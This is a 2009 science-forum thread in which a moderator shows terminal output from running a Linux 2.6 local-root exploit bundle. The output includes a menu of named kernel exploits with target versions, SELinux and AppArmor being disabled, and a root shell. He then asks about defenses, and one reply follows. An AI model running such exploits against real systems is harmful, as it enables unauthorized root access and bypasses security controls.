Hypography Science Forums: Ridiculous 2.6 Exploit - Hypography Science Forums

Jump to content

Welcome! You are currently viewing the Hypography Science Forum as a guest. In order to participate in our science discussions, you should register now! Registration is free and you can use your Facebook login if you like.
Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Ridiculous 2.6 Exploit Rate Topic: -----

#1 User is offline   alexander 

  • Dedicated Smart-ass
  • View gallery
  • Group: Moderators
  • Posts: 5,656
  • Joined: 04-May 04

Posted 19 November 2009 - 12:23 PM

So the other day, this guy, spender, found an exploit in the linux kernel that disables selinux rules, effecting basically almost every 2.6 kernel... payload? root, i call it root in one easy step, here's output from a run i did on my system earlier on:

alexander@alex:~/$ uname -a
Linux alex 2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:05:01 UTC 2009 x86_64 GNU/Linux
alexander@alex:~/$ id
uid=1000(alexander) gid=1000(alexander) groups=4(adm),20(dialout),24(cdrom),46(plugdev),110(lpadmin),111(sambashare),112(admin),126(burning),1000(alexander)
alexander@alex:~/$ ./run_exploit.sh 
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...failed.
Compiling exp_wunderbar.c...OK.
 [+] MAPPED ZERO PAGE!
Choose your exploit:
 [0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root
 [1] MooseCox: Linux-2.X->Linux.2.6.31.unfixed pipe local root
 [2] Paokara: Linux 2.6.19->2.6.31.1 eCryptfs local root
 [3] Powerglove: Linux 2.6.31 perf_counter local root
 [4] The Rebel: Linux < 2.6.19 udp_sendmsg() local root
 [5] Wunderbar Emporium: Linux 2.X sendpage() local root
 [6] Exit
> 1
 ------------------------------------------------------------------------------
 [+] Resolved selinux_enforcing to 0xffffffff819b7ba8
 [+] Resolved selinux_enabled to 0xffffffff819b7ba4
 [+] Resolved apparmor_enabled to 0xffffffff817f7184
 [+] Resolved security_ops to 0xffffffff819b6330
 [+] Resolved default_security_ops to 0xffffffff817b5120
 [+] Resolved sel_read_enforce to 0xffffffff8122dc20
 [+] Resolved audit_enabled to 0xffffffff81976324
 [+] Resolved commit_creds to 0xffffffff8107f270
 [+] Resolved prepare_kernel_cred to 0xffffffff8107f480
 [+] Using newer pipe_inode_info layout
 [+] We'll let this go for a while if needed...
 [+] got ring0!
 [+] detected cred support
 [+] Disabled security of : nothing, what an insecure machine!
 [+] Got root!
sh: gthumb: not found
# id
uid=0(root) gid=0(root)
#
if that's not ridiculous, i don't know what is....

The sad part is that this is not an issue found in selinux code itself, its a compiler optimization problem, which is crazy, right? So, question is, how do we protect from these types of exploits in the future, and also dark wizards?
~ Sun, number 1 cause of global warming.


Caution: some thinking required when using this product, keep your axons and dendrites inside your head at all times.
0

#2 User is offline   freeztar 

  • Pondering
  • Group: Moderators
  • Posts: 7,765
  • Joined: 29-October 05
  • LocationAtlanta, GA

Posted 19 November 2009 - 01:28 PM

Not in the code itself, but from the compiler? That must make debugging a severe pita. :phones:
Hypography Science Forums Moderator
---
"There are no passengers on Spaceship Earth. We are all crew." - Marshall McLuhan

"We must not forget that when radium was discovered no one knew that it would prove useful in hospitals. The work was one of pure science. And this is a proof that scientific work must not be considered from the point of view of the direct usefulness of it." - Marie Curie
0

#3 User is offline   alexander 

  • Dedicated Smart-ass
  • View gallery
  • Group: Moderators
  • Posts: 5,656
  • Joined: 04-May 04

Posted 19 November 2009 - 05:10 PM

yeah its crazy, i for one, may never optimize code ever again.... (lol not really)
~ Sun, number 1 cause of global warming.


Caution: some thinking required when using this product, keep your axons and dendrites inside your head at all times.
0

Share this topic:


Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users


View our Science Quizzes | Science links. About the Hypography Science Forums

Friends

We recommend these stellar sites:

PC Help Forum

ATL - Atlanta Computer Repair

Sponsors

Hypography?

Hypography [n.]: A combination of "hyperlink" and "bibliography" - ie, a list of links to electronic documents. Comparable to discography and bibliography, but not cartography.

When we launched in May 2000, we wanted to create a site to share science-related content of all kinds on the web. As time passed, our site turned into a pure science forum with lots of cool people.

So we kept the name Hypography and the cool science forum community - and aim to be a friendly place for discussion of science topics of all kinds.